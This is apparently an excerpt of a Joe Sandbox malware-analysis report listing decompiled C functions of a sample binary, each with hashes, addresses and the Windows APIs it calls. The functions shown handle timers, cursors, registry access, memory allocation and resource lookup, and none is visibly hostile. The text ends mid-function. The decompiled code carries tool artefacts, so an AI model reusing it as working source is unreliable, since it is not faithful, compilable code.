                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ExitFreeLibraryProcess
                                  • String ID:
                                  • API String ID: 1404682716-0
                                  • Opcode ID: b0814196e5adcb1db59610301452141c150887b4a63c9d44826f5b2ab0648a41
                                  • Instruction ID: 96844a66afa6844c28e6c2d961964a1061cf20ac4f8d982b6510397bb74ccb12
                                  • Opcode Fuzzy Hash: b0814196e5adcb1db59610301452141c150887b4a63c9d44826f5b2ab0648a41
                                  • Instruction Fuzzy Hash: F0214CB09012519BDF21AF6588483563BE4AB85319F1545BBEB04772D6D7BC9C80CB8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042E510, Relevance: 3.0, APIs: 2, Instructions: 47timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E0042E510(void* __eax, void* __ebx, void* __ecx, void* __esi) {
				char _v8;
				int _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t28;
				int _t32;
				intOrPtr _t35;

				_push(0);
				_t23 = __eax;
				_push(_t35);
				_push(0x42e58f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				KillTimer( *(__eax + 0x34), 1);
				_t32 =  *(_t23 + 0x30);
				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0) {
					_t17 = SetTimer( *(_t23 + 0x34), 1, _t32, 0); // executed
					if(_t17 == 0) {
						_t18 =  *0x46fd9c; // 0x41b670
						E00405C70(_t18,  &_v8);
						E0040B830(_v8, 1);
						E00403B64();
					}
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(0x42e596);
				return E0040411C( &_v8);
			}










                                  0x0042e513
                                  0x0042e517
                                  0x0042e51b
                                  0x0042e51c
                                  0x0042e521
                                  0x0042e524
                                  0x0042e52d
                                  0x0042e532
                                  0x0042e537
                                  0x0042e54f
                                  0x0042e556
                                  0x0042e55b
                                  0x0042e560
                                  0x0042e56f
                                  0x0042e574
                                  0x0042e574
                                  0x0042e556
                                  0x0042e57b
                                  0x0042e57e
                                  0x0042e581
                                  0x0042e58e

                                  APIs
                                  • KillTimer.USER32(?,00000001,00000000,0042E58F,?,?,?,00000000), ref: 0042E52D
                                  • SetTimer.USER32(?,00000001,?,00000000), ref: 0042E54F
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Timer$KillLoadString
                                  • String ID:
                                  • API String ID: 1423459280-0
                                  • Opcode ID: bdeaa2d0bcc86ec05bcf81ae964e93581af7120666b31909328b1525a8718864
                                  • Instruction ID: 19790332f25139d28a8781680781d9b6593a6125af45755c17349908bb212159
                                  • Opcode Fuzzy Hash: bdeaa2d0bcc86ec05bcf81ae964e93581af7120666b31909328b1525a8718864
                                  • Instruction Fuzzy Hash: 4C01B9307103147BD710EF96DC42B5637ACDB09708F9144A6F900572D2E279AD80C65C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00453C18, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00453C18(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x46efd8;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x470664; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E00453CD4(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                  0x00453c1c
                                  0x00453c2a
                                  0x00453c2d
                                  0x00453c32
                                  0x00453c37
                                  0x00453c3a
                                  0x00453c44
                                  0x00453c4e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00453c46
                                  0x00453c46
                                  0x00453c46
                                  0x00453c46
                                  0x00453c54
                                  0x00453c5f
                                  0x00453c64
                                  0x00453c65
                                  0x00453c68
                                  0x00453c71

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CursorLoad
                                  • String ID:
                                  • API String ID: 3238433803-0
                                  • Opcode ID: faf394f74a5a76277292f8f3109476e2ce605c8074518ccec34124b65b1660ea
                                  • Instruction ID: 8dba9e2d3183789ffca0dc11a5138402d5b26a0a19d73125cf67f6c9b6e533ad
                                  • Opcode Fuzzy Hash: faf394f74a5a76277292f8f3109476e2ce605c8074518ccec34124b65b1660ea
                                  • Instruction Fuzzy Hash: 13F08223B0024416AA25293E4CC1D2A72859BD1777B21033BFD3AE72D6C63E6D595259
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041B074, Relevance: 3.0, APIs: 2, Instructions: 18registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041B074(void* __eax) {
				void* _t7;
				void* _t14;

				_t14 = __eax;
				_t7 =  *(__eax + 4);
				if(_t7 != 0) {
					if( *((char*)(__eax + 0xc)) == 0) {
						RegFlushKey(_t7);
					}
					RegCloseKey( *(_t14 + 4)); // executed
					 *(_t14 + 4) = 0;
					return E0040411C(_t14 + 0x10);
				}
				return _t7;
			}





                                  0x0041b075
                                  0x0041b077
                                  0x0041b07c
                                  0x0041b082
                                  0x0041b085
                                  0x0041b085
                                  0x0041b08e
                                  0x0041b095
                                  0x00000000
                                  0x0041b09b
                                  0x0041b0a1

                                  APIs
                                  • RegFlushKey.ADVAPI32(00000000,?,0041B0E0,?,?,00000000,0041B1F7,?,00000000,00000000,00000000,?,?,00000000,0041B20D), ref: 0041B085
                                  • RegCloseKey.ADVAPI32(00000000,?,0041B0E0,?,?,00000000,0041B1F7,?,00000000,00000000,00000000,?,?,00000000,0041B20D), ref: 0041B08E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseFlush
                                  • String ID:
                                  • API String ID: 320916635-0
                                  • Opcode ID: 8d47401f022365cdb71e2ccf3c1b26fc193530ee717e70d92ac999f8f23fbfbd
                                  • Instruction ID: fbce6248488ed43558be84fdacfe256e5be37f47779b5215429c1e581fe7ffbf
                                  • Opcode Fuzzy Hash: 8d47401f022365cdb71e2ccf3c1b26fc193530ee717e70d92ac999f8f23fbfbd
                                  • Instruction Fuzzy Hash: 96D012B06002048ADF50DF7588C57477BD86F48304B08C4BBA809DF297E639C4908B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041AD00, Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0041AD00(struct HWND__* __eax) {
				long _t2;
				struct HWND__* _t6;

				_t6 = __eax;
				_t2 = GetWindowLongA(__eax, 0xfffffffc);
				_t5 = _t2;
				_push(_t6); // executed
				L00406604(); // executed
				if(_t2 != L004065DC) {
					return E0041AC28(_t5);
				}
				return _t2;
			}





                                  0x0041ad02
                                  0x0041ad07
                                  0x0041ad0c
                                  0x0041ad0e
                                  0x0041ad0f
                                  0x0041ad1a
                                  0x00000000
                                  0x0041ad1e
                                  0x0041ad25

                                  APIs
                                  • GetWindowLongA.USER32 ref: 0041AD07
                                  • 72E89840.USER32(00000000,00000000,000000FC,?,00000000,00431EAB,00000000,0043309B,00000000,00433282,?,00000000,004332F4), ref: 0041AD0F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: E89840LongWindow
                                  • String ID:
                                  • API String ID: 1839987407-0
                                  • Opcode ID: 5398ce69d566e0b603136df891a1d15438f9ba675af9c0e3f4a9521eff73e161
                                  • Instruction ID: 1a6d1295ad879cc51e45f2f1d25ae6bd91b41d757dadb1a0647e01936bb53e44
                                  • Opcode Fuzzy Hash: 5398ce69d566e0b603136df891a1d15438f9ba675af9c0e3f4a9521eff73e161
                                  • Instruction Fuzzy Hash: 90C0121120653427A521326D2C818EB018C880126D311163BB512A61C3DE6D0D6042DE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406A7C, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406A7C(int __eax, long __edx) {
				void* _t2;

				_t2 = GlobalAlloc(__eax, __edx); // executed
				GlobalFix(_t2);
				return _t2;
			}




                                  0x00406a7e
                                  0x00406a84
                                  0x00406a89

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Global$Alloc
                                  • String ID:
                                  • API String ID: 2558781224-0
                                  • Opcode ID: 125812dadcd751747e186adb72ec13e1d2cee62e5d1486aefeb6c52e57f55d37
                                  • Instruction ID: c99478ccaa3089254f3f8c0883599ba1b5e243e8dba37db129ac892a5b11e41c
                                  • Opcode Fuzzy Hash: 125812dadcd751747e186adb72ec13e1d2cee62e5d1486aefeb6c52e57f55d37
                                  • Instruction Fuzzy Hash: 839002C4A0030029DC1072B20C1AD3F052D5DD47083C248EE3102B3083983E842000B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040152C, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040152C(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E004013E0(0x4705e8, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                  0x0040152f
                                  0x00401539
                                  0x00401548
                                  0x0040153b
                                  0x0040153b
                                  0x0040153b
                                  0x0040154e
                                  0x0040155b
                                  0x00401560
                                  0x00401562
                                  0x00401566
                                  0x0040156f
                                  0x00401576
                                  0x00401582
                                  0x00401589
                                  0x00000000
                                  0x00401589
                                  0x00401576
                                  0x0040158e

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0040183D), ref: 0040155B
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0040183D), ref: 00401582
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 46017f76d4ababe246a5a5b49f8afe02733473bca792890391ce7170ae40c2a3
                                  • Instruction ID: 85e4f71e4becb8d36ef98f7be845cf46fd0e324e8ccc196a8376d49f0cc24473
                                  • Opcode Fuzzy Hash: 46017f76d4ababe246a5a5b49f8afe02733473bca792890391ce7170ae40c2a3
                                  • Instruction Fuzzy Hash: 90F0E272B0063027EB20566A4C82B5655949B85B94F144076FE4DFF3D8D2B98C0142A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040CE2A, Relevance: 2.5, APIs: 2, Instructions: 27COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040CE2A(void* __ecx, signed int __edx, void* __eflags, void* __fp0) {
				void* _t4;
				void* _t5;
				void* _t15;
				signed int _t18;
				void* _t23;

				_t5 = E00403764(_t4, __edx);
				_t18 = __edx;
				_t23 = _t5;
				E0040CEB8(_t23, __ecx, __fp0);
				E00403388(_t18 & 0x000000fc);
				CloseHandle( *(_t23 + 0x10)); // executed
				CloseHandle( *(_t23 + 0x14));
				_t15 = E00403398( *((intOrPtr*)(_t23 + 0x20)));
				if(_t18 > 0) {
					return E0040370C(_t23);
				}
				return _t15;
			}








                                  0x0040ce2e
                                  0x0040ce33
                                  0x0040ce35
                                  0x0040ce39
                                  0x0040ce45
                                  0x0040ce4e
                                  0x0040ce57
                                  0x0040ce5f
                                  0x0040ce66
                                  0x00000000
                                  0x0040ce6a
                                  0x0040ce71

                                  APIs
                                    • Part of subcall function 0040CEB8: GetCurrentThreadId.KERNEL32 ref: 0040CEC3
                                  • CloseHandle.KERNEL32(?), ref: 0040CE4E
                                  • CloseHandle.KERNEL32(?,?), ref: 0040CE57
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseHandle$CurrentThread
                                  • String ID:
                                  • API String ID: 1015134532-0
                                  • Opcode ID: a0365eb8f89645a42e544926c51dadebdce79a6919837bb8a60e5c77dfb78149
                                  • Instruction ID: a7db9104fb2c00f2790ae6a06ed29bb2be1d349023e35b880379ab15708ca4ad
                                  • Opcode Fuzzy Hash: a0365eb8f89645a42e544926c51dadebdce79a6919837bb8a60e5c77dfb78149
                                  • Instruction Fuzzy Hash: C3E01AA2300B1097C621BBBEA8C245E66989E4665A304463EB541EF2D2DA3DDE15439D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041B228, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E0041B228(intOrPtr* __eax, void* __ebx, void* __edx, void* __esi) {
				char _v4;
				char _v8;
				char _v9;
				void* _v16;
				intOrPtr _v117;
				char* _t63;
				signed int _t66;
				char* _t69;
				signed int _t72;
				char* _t75;
				signed int _t78;
				signed char _t98;
				intOrPtr _t111;
				intOrPtr* _t120;
				void* _t123;

				_pop(_t123);
				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_v4 = 0;
				_t120 = __eax;
				_push(_t123);
				_push(0x41b3c6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t123 + 0xfffffff4;
				E004041B4( &_v4, __edx);
				_t98 = E0041AFC8(_v4);
				if(_t98 == 0) {
					E0040467C( &_v8, 1, 1);
				}
				_v16 = 0;
				_t63 = E004045DC(_v8);
				_t66 = RegOpenKeyExA(E0041B0F4(_t120, _t98), _t63, 0, 0x20019,  &_v16); // executed
				_v9 = _t66 == 0;
				if(_v9 == 0) {
					_t69 = E004045DC(_v8);
					_t72 = RegOpenKeyExA(E0041B0F4(_t120, _t98), _t69, 0, 0x20009,  &_v16);
					_v9 = _t72 == 0;
					if(_v9 == 0) {
						_t75 = E004045DC(_v8);
						_t78 = RegOpenKeyExA(E0041B0F4(_t120, _t98), _t75, 0, 1,  &_v16);
						_v9 = _t78 == 0;
						if(_v9 != 0) {
							 *(_t120 + 0x18) = 1;
							if(((_t78 & 0xffffff00 |  *((intOrPtr*)(_t120 + 4)) != 0x00000000) & _t98) != 0) {
								_push( *((intOrPtr*)(_t120 + 0x10)));
								_push(E0041B3E0);
								_push(_v8);
								E0040449C();
							}
							E0041B0D0(_t120, _v8, _v16);
						}
					} else {
						 *(_t120 + 0x18) = 0x20009;
						if(((_t72 & 0xffffff00 |  *((intOrPtr*)(_t120 + 4)) != 0x00000000) & _t98) != 0) {
							_push( *((intOrPtr*)(_t120 + 0x10)));
							_push(E0041B3E0);
							_push(_v8);
							E0040449C();
						}
						E0041B0D0(_t120, _v8, _v16);
					}
				} else {
					 *(_t120 + 0x18) = 0x20019;
					if(((_t66 & 0xffffff00 |  *((intOrPtr*)(_t120 + 4)) != 0x00000000) & _t98) != 0) {
						_push( *((intOrPtr*)(_t120 + 0x10)));
						_push(E0041B3E0);
						_push(_v8);
						E0040449C();
					}
					E0041B0D0(_t120, _v8, _v16);
				}
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0041B3CD);
				return E0040411C( &_v8);
			}


















                                  0x0041b228
                                  0x0041b229
                                  0x0041b22b
                                  0x0041b236
                                  0x0041b23b
                                  0x0041b23f
                                  0x0041b240
                                  0x0041b245
                                  0x0041b248
                                  0x0041b250
                                  0x0041b25d
                                  0x0041b261
                                  0x0041b270
                                  0x0041b270
                                  0x0041b277
                                  0x0041b288
                                  0x0041b298
                                  0x0041b29f
                                  0x0041b2a7
                                  0x0041b2f3
                                  0x0041b303
                                  0x0041b30a
                                  0x0041b312
                                  0x0041b358
                                  0x0041b368
                                  0x0041b36f
                                  0x0041b377
                                  0x0041b379
                                  0x0041b389
                                  0x0041b38b
                                  0x0041b38e
                                  0x0041b393
                                  0x0041b39e
                                  0x0041b39e
                                  0x0041b3ab
                                  0x0041b3ab
                                  0x0041b314
                                  0x0041b314
                                  0x0041b324
                                  0x0041b326
                                  0x0041b329
                                  0x0041b32e
                                  0x0041b339
                                  0x0041b339
                                  0x0041b346
                                  0x0041b346
                                  0x0041b2a9
                                  0x0041b2a9
                                  0x0041b2b9
                                  0x0041b2bb
                                  0x0041b2be
                                  0x0041b2c3
                                  0x0041b2ce
                                  0x0041b2ce
                                  0x0041b2db
                                  0x0041b2db
                                  0x0041b3b2
                                  0x0041b3b5
                                  0x0041b3b8
                                  0x0041b3c5

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,0041B3C6), ref: 0041B298
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: d85c03be176bcdc36716843f03fd34529b475baa92fe1d6a31b4ce1bcbad53f5
                                  • Instruction ID: 1f2450826590cab1515ca360b350964bc0a06a1ecc3d316448b2bde7cdf9bc2a
                                  • Opcode Fuzzy Hash: d85c03be176bcdc36716843f03fd34529b475baa92fe1d6a31b4ce1bcbad53f5
                                  • Instruction Fuzzy Hash: 7621C270A04208AFDB12DBA5C852BDEB7F5EB49304F1044BBE810E3692DB799F549788
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004138D4, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E004138D4(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				intOrPtr _t15;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x470664; // 0x400000
				}
				_t10 = FindResourceA(_t20, E004045DC(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_v8 = E004163E8(_t20, 1, 0xa, _t32);
					_push(_t38);
					_push(0x413948);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_t15 = E00415ED4(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
					 *_t35 = _t15;
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(E0041394F);
					return E00403398(_v8);
				}
			}


















                                  0x004138d5
                                  0x004138d7
                                  0x004138db
                                  0x004138dd
                                  0x004138df
                                  0x004138e3
                                  0x004138e5
                                  0x004138e5
                                  0x004138fd
                                  0x00413900
                                  0x00413902
                                  0x00413956
                                  0x00413904
                                  0x00413915
                                  0x0041391a
                                  0x0041391b
                                  0x00413920
                                  0x00413923
                                  0x0041392b
                                  0x00413930
                                  0x00413934
                                  0x00413937
                                  0x0041393a
                                  0x00413947
                                  0x00413947

                                  APIs
                                  • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 004138F6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FindResource
                                  • String ID:
                                  • API String ID: 1635176832-0
                                  • Opcode ID: 641d8e5b1ca492e37d8dc89d2752d518b5dd288c22cbfd40209ec55e453b7153
                                  • Instruction ID: 4f055157ae6aa7acff666d98049c619c1a81d90d2bf05d19d25692b164bb8dee
                                  • Opcode Fuzzy Hash: 641d8e5b1ca492e37d8dc89d2752d518b5dd288c22cbfd40209ec55e453b7153
                                  • Instruction Fuzzy Hash: 8001F771304304BFD711EF66DC9299AB7DDDB89714711403BF504DB251DAB99D01D628
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041B4D2, Relevance: 1.5, APIs: 1, Instructions: 48registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041B4D2(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) {
				int _v8;
				char _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t18;
				void* _t26;
				intOrPtr _t30;
				char _t38;

				_t35 = __ecx;
				_t38 = __edx;
				_t26 = __eax;
				_v8 = 0;
				_t18 = RegQueryValueExA( *(_t26 + 4), E004045DC(__edx), 0,  &_v8, __ecx,  &_a8); // executed
				if(_t18 != 0) {
					_v16 = _t38;
					_v12 = 0xb;
					_t30 =  *0x46fdd4; // 0x4109b0
					E0040B928(_t26, _t30, 1, _t35, _t38, 0,  &_v16);
					E00403B64();
				}
				 *_a4 = E0041AFDC(_v8);
				return _a8;
			}














                                  0x0041b4dd
                                  0x0041b4df
                                  0x0041b4e1
                                  0x0041b4e5
                                  0x0041b4ff
                                  0x0041b506
                                  0x0041b508
                                  0x0041b50b
                                  0x0041b515
                                  0x0041b522
                                  0x0041b527
                                  0x0041b527
                                  0x0041b53a
                                  0x0041b544

                                  APIs
                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0041B4FF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 11130073650470f801779401c3d7f3d91b42341ad29b22150650c83aaed25166
                                  • Instruction ID: 7fa46106d3948fbd68e206c0437450774b6a6f74ae9f9a5420089c0b034f225e
                                  • Opcode Fuzzy Hash: 11130073650470f801779401c3d7f3d91b42341ad29b22150650c83aaed25166
                                  • Instruction Fuzzy Hash: 9A012175A00208AFD700DFA9DC81AEAB7ACDB49314F008176F914DB282D6759E04CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041B4D4, Relevance: 1.5, APIs: 1, Instructions: 47registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041B4D4(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) {
				int _v8;
				char _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t18;
				void* _t25;
				intOrPtr _t28;
				char _t33;

				_t32 = __ecx;
				_t33 = __edx;
				_t25 = __eax;
				_v8 = 0;
				_t18 = RegQueryValueExA( *(_t25 + 4), E004045DC(__edx), 0,  &_v8, __ecx,  &_a8); // executed
				if(_t18 != 0) {
					_v16 = _t33;
					_v12 = 0xb;
					_t28 =  *0x46fdd4; // 0x4109b0
					E0040B928(_t25, _t28, 1, _t32, _t33, 0,  &_v16);
					E00403B64();
				}
				 *_a4 = E0041AFDC(_v8);
				return _a8;
			}














                                  0x0041b4dd
                                  0x0041b4df
                                  0x0041b4e1
                                  0x0041b4e5
                                  0x0041b4ff
                                  0x0041b506
                                  0x0041b508
                                  0x0041b50b
                                  0x0041b515
                                  0x0041b522
                                  0x0041b527
                                  0x0041b527
                                  0x0041b53a
                                  0x0041b544

                                  APIs
                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0041B4FF
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: c6d0b0f4177d66c064a70513ada52b6b26d5068b8f398f75d542e62470591afa
                                  • Instruction ID: b709256a61fd38dc1cec6e3d4eb20bc9ad8d91630d4d3c6394ca961e675e1c11
                                  • Opcode Fuzzy Hash: c6d0b0f4177d66c064a70513ada52b6b26d5068b8f398f75d542e62470591afa
                                  • Instruction Fuzzy Hash: 54014475A00208AFD700DFA9DC81ADAB7ACDB49314F008177F914DB382D6759E04CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406AC2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00406AC2(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
